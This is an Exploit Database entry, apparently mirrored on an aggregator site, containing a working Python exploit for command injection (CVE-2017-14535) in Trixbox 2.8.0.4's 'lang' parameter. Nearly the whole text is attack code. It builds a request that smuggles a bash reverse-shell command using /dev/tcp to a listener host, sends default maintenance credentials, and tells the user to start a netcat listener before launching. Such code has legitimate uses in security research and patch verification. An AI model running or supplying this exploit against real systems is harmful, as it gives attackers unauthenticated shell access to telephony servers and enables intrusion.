Trixbox 2.8.0.4 – ‘lang’ Remote Code Execution (Unauthenticated)

• Exploit Database
• 36 阅读

• 作者： Ron Jost
  日期： 2021-05-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49913/

• # Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
  # Date: 27.05.2021
  # Exploit Author: Ron Jost (Hacker5preme)
  # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
  # Credits to: Sachin Wagh
  # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
  # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
  # Version: 2.8.0.4
  # Tested on: Xubuntu 20.04
  # CVE: CVE-2017-14535
  
  '''
  Description:
  trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php
  '''
  
  
  
  '''
  Import required modules:
  '''
  import requests
  import sys
  import time
  
  
  '''
  User-input:
  '''
  target_ip = sys.argv[1]
  target_port = sys.argv[2]
  listen_ip = sys.argv[3]
  listen_port = sys.argv[4]
  
  
  '''
  Construct malicious request:
  '''
  # Construct header:
  header = {
  'Host': target_ip,
  'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
  'Accept-Encoding': 'gzip, deflate',
  'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
  'Connection': 'close',
  'Upgrade-Insecure-Requests': '1',
  'Cache-Control': 'max-age=0'
  }
  
  # Construct malicious link:
  link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'
  link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'
  link = link_p1 + link_p2
  
  
  '''
  Finish: EXPLOIT!!!
  '''
  print('')
  print('')
  print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)
  print('')
  time.sleep(2)
  Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")
  if Ready == 'EXPLOIT':
  print('')
  print('Exploit sent, check your Netcat instance :)')
  x = requests.post(link, headers=header)
  else:
  print('TRY AGAIN')